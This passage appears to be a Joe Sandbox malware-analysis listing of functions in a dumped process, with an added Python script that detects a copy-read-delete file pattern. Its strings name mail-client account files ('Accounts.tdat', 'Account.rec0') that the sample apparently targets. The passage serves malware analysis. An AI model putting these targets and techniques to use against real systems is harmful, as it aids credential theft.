                                                              • _free.LIBCMT ref: 23D77D80
                                                              • _free.LIBCMT ref: 23D77D8B
                                                              • _free.LIBCMT ref: 23D77DC3
                                                              • _free.LIBCMT ref: 23D77DCA
                                                              • _free.LIBCMT ref: 23D77DE7
                                                              • _free.LIBCMT ref: 23D77DFF
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: c1f4ad3247c0e508e66ca423df08511b62fbdc47d167b7bb74b8f597da2934e2
                                                              • Instruction ID: 2b93a7f870f15c3f38520533c651f75db32479d9d67bea86d644ede2c5d93a93
                                                              • Opcode Fuzzy Hash: c1f4ad3247c0e508e66ca423df08511b62fbdc47d167b7bb74b8f597da2934e2
                                                              • Instruction Fuzzy Hash: DF314C31600305DFEB21AB38D984BBAB7FAEF40610F1448EEE859D7251DE75E990CB25

                                                              Control-flow Graph

                                                              APIs
                                                              • _free.LIBCMT ref: 23D759EA
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D759F6
                                                              • _free.LIBCMT ref: 23D75A01
                                                              • _free.LIBCMT ref: 23D75A0C
                                                              • _free.LIBCMT ref: 23D75A17
                                                              • _free.LIBCMT ref: 23D75A22
                                                              • _free.LIBCMT ref: 23D75A2D
                                                              • _free.LIBCMT ref: 23D75A38
                                                              • _free.LIBCMT ref: 23D75A43
                                                              • _free.LIBCMT ref: 23D75A51
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 4681a8e62d08450124a325abedb789e939d9e7405907d7814e2a946e8525dd49
                                                              • Instruction ID: 48eacf6d8128899b86816577bf362f431fd287e41e5d19cb931164ff4d1f86e0
                                                              • Opcode Fuzzy Hash: 4681a8e62d08450124a325abedb789e939d9e7405907d7814e2a946e8525dd49
                                                              • Instruction Fuzzy Hash: 3711B67A520248FFCB21DF54C841DDD3FB6EF54250B0540EDBA088F225DA31DA50DBA2

                                                              Control-flow Graph

                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23D71D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D58
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D8A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: 4d41781c3ef08725c7ec5a52715e953b5f1a205d6d2ca6da9c601c5661108576
                                                              • Instruction ID: d52ced8a2ac80652a4083d4772b9611a54bdc96b1e1b6f0dc8098c8e38a224a0
                                                              • Opcode Fuzzy Hash: 4d41781c3ef08725c7ec5a52715e953b5f1a205d6d2ca6da9c601c5661108576
                                                              • Instruction Fuzzy Hash: 4321127294121CBFD720ABA08C8CFEF76BCFB28755F0405AAF515D2184E6749E468B70
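The API sequence of this function (CopyFileW, then CreateFileW with dwDesiredAccess 80000000, dwCreationDisposition 00000003 and dwFlagsAndAttributes 00000080, then GetFileSize, ReadFile, CloseHandle and DeleteFileW, with a second DeleteFileW site before the read) is the copy-then-read-then-delete idiom for reading a file that another process holds open: copy it, open the copy for reading, read it into memory, remove the copy. The Python script below is an added example and is not part of the Joe Sandbox report or of the sample's code. It parses the report's API reference lines (the seven lines above, embedded as a constructed sample), decodes the CreateFileW arguments with the documented Win32 constants, and flags the chain by ref address. Function and variable names are the example's own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: the API reference lines of the function above, copied
# from the report. Module base is 0x23D70000 ("Offset: 23D70000" in the dump source).
MODULE_BASE = 0x23D70000
SAMPLE_API_LINES = """
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23D71D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D8A
"""

# One report line: "<api>.<module>(<args>), ref: <hex address>"
API_LINE_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")

# Win32 constants (winnt.h / fileapi.h)
GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
GENERIC_EXECUTE, GENERIC_ALL = 0x20000000, 0x10000000
FILE_ATTRIBUTE_NORMAL = 0x80
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def parse_api_lines(text: str) -> List[Dict]:
    """Turn the report's API reference lines into call records, in report order."""
    calls = []
    for api, module, args, ref in API_LINE_RE.findall(text):
        calls.append({"api": api, "module": module,
                      "args": [a.strip() for a in args.split(",")],
                      "ref": int(ref, 16)})
    return calls


def _arg(value: str) -> Optional[int]:
    # "?" means the sandbox could not resolve that stack slot
    return None if value == "?" else int(value, 16)


def decode_createfile(args: List[str]) -> Dict:
    """Decode CreateFileW's seven real arguments; anything after them is stack noise."""
    access = _arg(args[1])
    share = _arg(args[2])
    disposition = _arg(args[4])
    flags = _arg(args[5])
    names = ((GENERIC_READ, "GENERIC_READ"), (GENERIC_WRITE, "GENERIC_WRITE"),
             (GENERIC_EXECUTE, "GENERIC_EXECUTE"), (GENERIC_ALL, "GENERIC_ALL"))
    return {
        "access": [n for bit, n in names if access is not None and access & bit],
        "share": share,  # 0 = no sharing: the copy is opened exclusively
        "disposition": CREATION_DISPOSITION.get(
            disposition, "?" if disposition is None else hex(disposition)),
        "attributes": "FILE_ATTRIBUTE_NORMAL" if flags == FILE_ATTRIBUTE_NORMAL
                      else ("?" if flags is None else hex(flags)),
    }


def find_copy_read_delete(calls: List[Dict]) -> Optional[List[int]]:
    """Return the ref addresses of CopyFileW -> CreateFileW(read) -> ReadFile -> DeleteFileW
    in call order, or None if the chain is not present."""
    wanted = ["CopyFileW", "CreateFileW", "ReadFile", "DeleteFileW"]
    hits, i = [], 0
    for call in calls:
        if call["api"] != wanted[i]:
            continue
        if call["api"] == "CreateFileW" and \
                "GENERIC_READ" not in decode_createfile(call["args"])["access"]:
            continue
        hits.append(call["ref"])
        i += 1
        if i == len(wanted):
            return hits
    return None


def rva(address: int) -> int:
    """Module-relative offset, stable if the dump is rebased."""
    return address - MODULE_BASE


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for c in calls:
        print(f"+0x{rva(c['ref']):04x} {c['api']}")
    chain = find_copy_read_delete(calls)
    print("copy/read/delete chain:", [hex(a) for a in chain] if chain else "absent")
    print("CreateFileW:", decode_createfile(calls[1]["args"]))
```

The decoder reads only the first seven stack values of CreateFileW because that is the function's arity; the extra values the report prints are whatever else was on the stack at the hook point. The chain matcher deliberately ignores the DeleteFileW at 23D71D4B between the open and the read and anchors on the one after CloseHandle, so the two delete sites bracketing the read do not produce two hits.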

                                                              Control-flow Graph

                                                              • Graph image not reproduced. Basic blocks 23d79492-23d79644; subroutine calls: 23d72ada, 23d77c19, 23d779e6; APIs on the path: GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError.
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23D79C07,?,00000000,?,00000000,00000000), ref: 23D794D4
                                                              • __fassign.LIBCMT ref: 23D7954F
                                                              • __fassign.LIBCMT ref: 23D7956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 23D79590
                                                              • WriteFile.KERNEL32(?,?,00000000,23D79C07,00000000,?,?,?,?,?,?,?,?,?,23D79C07,?), ref: 23D795AF
                                                              • WriteFile.KERNEL32(?,?,00000001,23D79C07,00000000,?,?,?,?,?,?,?,?,?,23D79C07,?), ref: 23D795E8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: e5628b83191262c479b15d1bed32e00fb3d307378dd301a80ca693faee9e0f5a
                                                              • Instruction ID: 37823afbeb11d58287e3df2353416fe6f197233dcdfd36fa7eb4e429168ad120
                                                              • Opcode Fuzzy Hash: e5628b83191262c479b15d1bed32e00fb3d307378dd301a80ca693faee9e0f5a
                                                              • Instruction Fuzzy Hash: 9251B5B2D002099FCB10CFA8C895AEEBBF9EF19710F14415EE955E7281E770E941CB60

                                                              Control-flow Graph

                                                              • Graph image not reproduced. Basic blocks 23d73370-23d734c6; subroutine calls: 23d73330, 23d737a7, 23d73790, 23d73740, 23d73774, 23d7bbe0, 23d73758.
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 23D7339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 23D733A3
                                                              • _ValidateLocalCookies.LIBCMT ref: 23D73431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 23D7345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 23D734B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 0d9c57c9f1c2049d12b0501f63e40539c736bfe0e3d2e0f5c19999e69c06d8e7
                                                              • Instruction ID: e0b3cb2238ac5283509686fe6f79b80ebc7e5a148945909399cf12cc3bd18cc4
                                                              • Opcode Fuzzy Hash: 0d9c57c9f1c2049d12b0501f63e40539c736bfe0e3d2e0f5c19999e69c06d8e7
                                                              • Instruction Fuzzy Hash: 8641F435E00208ABCF14DF78C880A8EBBB5BF55228F0881DDD914AB291D731EA05CBE1

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 23D79221: _free.LIBCMT ref: 23D7924A
                                                              • _free.LIBCMT ref: 23D792AB
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D792B6
                                                              • _free.LIBCMT ref: 23D792C1
                                                              • _free.LIBCMT ref: 23D79315
                                                              • _free.LIBCMT ref: 23D79320
                                                              • _free.LIBCMT ref: 23D7932B
                                                              • _free.LIBCMT ref: 23D79336
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 91d9c975f4e4c4e31b3f05567ad2fc41bc59c524cb72bdc12bbed77578e9fe7f
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: C1114F72640B08EAD670FBB0DC45FCB7BBE9F58700FC1086DA69976052DA75B6048662

                                                              Control-flow Graph

                                                              • Graph image not reproduced. Basic blocks 23d78821-23d78a3c; subroutine calls: 23d79341, 23d72ada, 23d7bf20, 23d756d0, 23d75f19, 23d78801; APIs on the path: MultiByteToWideChar (twice), WideCharToMultiByte.
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23D76FFD,00000000,?,?,?,23D78A72,?,?,00000100), ref: 23D7887B
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,23D78A72,?,?,00000100,5EFC4D8B,?,?), ref: 23D78901
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 23D789FB
                                                              • __freea.LIBCMT ref: 23D78A08
                                                                • Part of subcall function 23D756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23D75702
                                                              • __freea.LIBCMT ref: 23D78A11
                                                              • __freea.LIBCMT ref: 23D78A36
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 710ff0001c2b7407d692f5c462206627eb91417a35000fb4e8b17bce94af398f
                                                              • Instruction ID: 8cb932d9a1ae5d69b1211f972b5461606b1d31aceb95e2dc1a2a88b9883e1ede
                                                              • Opcode Fuzzy Hash: 710ff0001c2b7407d692f5c462206627eb91417a35000fb4e8b17bce94af398f
                                                              • Instruction Fuzzy Hash: 59510472A50246AFDB259E60CC42EBF77BAFF50A50F1406ADFD04D6180EB34DC50C6A1

                                                              Control-flow Graph

                                                              APIs
                                                              • _strlen.LIBCMT ref: 23D71607
                                                              • _strcat.LIBCMT ref: 23D7161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,23D7190E,?,?,00000000,?,00000000), ref: 23D71643
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D7165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,23D7190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23D71661
                                                              • lstrcatW.KERNEL32(00001008,?), ref: 23D71686
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: 2dcf0b71e20b2587b3f215993036dbda3d866a2cc2ab3434d135d704b30e2319
                                                              • Instruction ID: 2886827e243b4481dc3e546e8bd81b4aac757a828e5392ea81f37d73b110e479
                                                              • Opcode Fuzzy Hash: 2dcf0b71e20b2587b3f215993036dbda3d866a2cc2ab3434d135d704b30e2319
                                                              • Instruction Fuzzy Hash: B321F532A00304ABCB119BA4DC85EEE77B8EF98710F24405FE504AB185EB74A54687B5

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D71038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23D7104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23D71061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23D71075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23D71090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 23D710B8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: c26615638e008ade0c93b745c78a224029476f59a398a6444a80f7bcfb64f750
                                                              • Instruction ID: 5c8483ee2208a07b1423563dd3b3a18386bb3270e7f966481d25f694a60be330
                                                              • Opcode Fuzzy Hash: c26615638e008ade0c93b745c78a224029476f59a398a6444a80f7bcfb64f750
                                                              • Instruction Fuzzy Hash: EF2181369003289BCF20EB61DC48EDB377CEF44254F14429AE969971A5DA30DA9ACB50

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,23D73518,23D723F1,23D71F17), ref: 23D73864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23D73872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 23D7388B
                                                              • SetLastError.KERNEL32(00000000,?,23D73518,23D723F1,23D71F17), ref: 23D738DD
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: c617d3c216270b36459f334e6d090906acedfd450898052bad5061d6fb7c20b0
                                                              • Instruction ID: ebc27c3de4f759dd384360853856ad2e6f4a796fde70842fef4872a7e5c0eeb5
                                                              • Opcode Fuzzy Hash: c617d3c216270b36459f334e6d090906acedfd450898052bad5061d6fb7c20b0
                                                              • Instruction Fuzzy Hash: BA014C336587115FE3123A79AC889062B7CDF25A7173003BEE114580D1EF25D81283D4
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,23D76C6C), ref: 23D75AFA
                                                              • _free.LIBCMT ref: 23D75B2D
                                                              • _free.LIBCMT ref: 23D75B55
                                                              • SetLastError.KERNEL32(00000000,?,?,23D76C6C), ref: 23D75B62
                                                              • SetLastError.KERNEL32(00000000,?,?,23D76C6C), ref: 23D75B6E
                                                              • _abort.LIBCMT ref: 23D75B74
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: f251bd7cfbdcb0201da8e0836620082d34a45bee914f5bd33e91286010d56442
                                                              • Instruction ID: a02b5384355d8befda96dc156db800deae340c77d36c158967f46c54bc1f0a00
                                                              • Opcode Fuzzy Hash: f251bd7cfbdcb0201da8e0836620082d34a45bee914f5bd33e91286010d56442
                                                              • Instruction Fuzzy Hash: 7BF0A437514600ABD25336346C4CF6A2A7BCBE1971B2901ADF918A6181FE248512C177
                                                              APIs
                                                                • Part of subcall function 23D71E89: lstrlenW.KERNEL32(?,?,?,?,?,23D710DF,?,?,?,00000000), ref: 23D71E9A
                                                                • Part of subcall function 23D71E89: lstrcatW.KERNEL32(?,?), ref: 23D71EAC
                                                                • Part of subcall function 23D71E89: lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EB3
                                                                • Part of subcall function 23D71E89: lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EC8
                                                                • Part of subcall function 23D71E89: lstrcatW.KERNEL32(?,23D710DF), ref: 23D71ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 23D7122A
                                                                • Part of subcall function 23D7173A: _strlen.LIBCMT ref: 23D71855
                                                                • Part of subcall function 23D7173A: _strlen.LIBCMT ref: 23D71869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: f0eb57ea4aa450b8063104e831bb20f86a6874d8e19545a72d678af88e12bb6b
                                                              • Instruction ID: b503a7a81d9fdb6340186e49b14245051389b92e8fbe62df6943281cafb21a4e
                                                              • Opcode Fuzzy Hash: f0eb57ea4aa450b8063104e831bb20f86a6874d8e19545a72d678af88e12bb6b
                                                              • Instruction Fuzzy Hash: 3221E9B9E103186AE72097E4DC81FED7339EF50714F00168AF604EB1D4E6B16E868768
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23D74AEA,?,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000), ref: 23D74B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23D74B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,23D74AEA,?,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000,00000001,23D72082), ref: 23D74B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: e3e77e3977425919221f4554f5b3b580c0cbb5a40e3b5c49da2dfca29db346ae
                                                              • Instruction ID: 3e5d2f712c81a9d36799d42166350583dc1abcfbb8cbf105f1e3fced1d6b9499
                                                              • Opcode Fuzzy Hash: e3e77e3977425919221f4554f5b3b580c0cbb5a40e3b5c49da2dfca29db346ae
                                                              • Instruction Fuzzy Hash: 4CF06232A00218BFDB12BFA0CC4CF9DBFB9EF54751F0041A9F905A6190EB34AD55CA94
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 23D7715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 23D7717F
                                                                • Part of subcall function 23D756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23D75702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 23D771A5
                                                              • _free.LIBCMT ref: 23D771B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 23D771C7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 740fad2a858eee93a56717be6edf20eb9a5c10301f694f58ccbcac761db3e0e2
                                                              • Instruction ID: 4978391c9c1f3f8c9bd551a0f0aa881d00dfd7ea8c8f866bfd47c278670ecffa
                                                              • Opcode Fuzzy Hash: 740fad2a858eee93a56717be6edf20eb9a5c10301f694f58ccbcac761db3e0e2
                                                              • Instruction Fuzzy Hash: EB01A773602315BFA7212AB64C8CD7B6A7DDFD2DA031415AFBD04C7240EE648C0682B5
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,23D7636D,23D75713,00000000,?,23D72249,?,?,23D71D66,00000000,?,?,00000000), ref: 23D75B7F
                                                              • _free.LIBCMT ref: 23D75BB4
                                                              • _free.LIBCMT ref: 23D75BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D75BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D75BF1
                                                              Memory Dump Source
